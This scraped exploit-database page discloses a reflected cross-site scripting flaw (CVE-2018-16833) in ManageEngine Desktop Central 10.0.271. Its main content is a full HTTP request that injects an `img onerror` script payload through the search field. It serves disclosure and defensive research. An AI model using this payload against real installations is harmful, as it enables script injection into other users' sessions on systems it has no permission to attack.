Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting - exploit.company
header-logo
Suggest Exploit
vendor:
ManageEngine Desktop Central
by:
Ismail Tasdelen
6.1
CVSS
MEDIUM
Cross-site Scripting
Unknown
CWE
Product Name: ManageEngine Desktop Central
Affected Version From: 10.0.271
Affected Version To: 10.0.271
Patch Exists: Unknown
Related CWE: CVE-2018-16833
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2018

ManageEngine Desktop Central 10.0.271 – Cross-Site Scripting

Zoho ManageEngine Desktop Central 10.0.271 has XSS via the "Features & Articles" search field to the /advsearch.do?SUBREQUEST=XMLHTTP URI.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting
# Date: 2018-09-11 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/desktop-central/
# Software : ZOHO Corp ManageEngine Desktop Central 10
# Product Version: 10.0.271
# Vulernability Type : Cross-site Scripting
# Vulenrability : Reflected 
# CVE : CVE-2018-16833

# Zoho ManageEngine Desktop Central 10.0.271 has XSS via the "Features & Articles" 
# search field to the /advsearch.do?SUBREQUEST=XMLHTTP URI.
 
# HTTP Request Header :

POST /advsearch.do?SUBREQUEST=XMLHTTP HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://TARGET/homePage.do?actionToCall=homePageDetails
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
X-ZCSRF-TOKEN: =All
Content-Length: 222
Cookie: DCJSESSIONID=34B31AEA87E0A617AB23A607C980CC07; DCJSESSIONIDSSO=0738458E311E15CD1E28F27F1DED5388; dc_customerid=All; summarypage=true; DM_SPDA_LST=1536665909495
Connection: close

q="><img src=x onerror=alert('ismailtasdelen')>&src=sall&stab=Home&page=1&pagelimit=10&searchParamId=901&searchParamName=dm.advsearch.features.articles&id=1536666162979&isTriggerFromMenu=false&actionToCall=getSearchResults
cqrsecured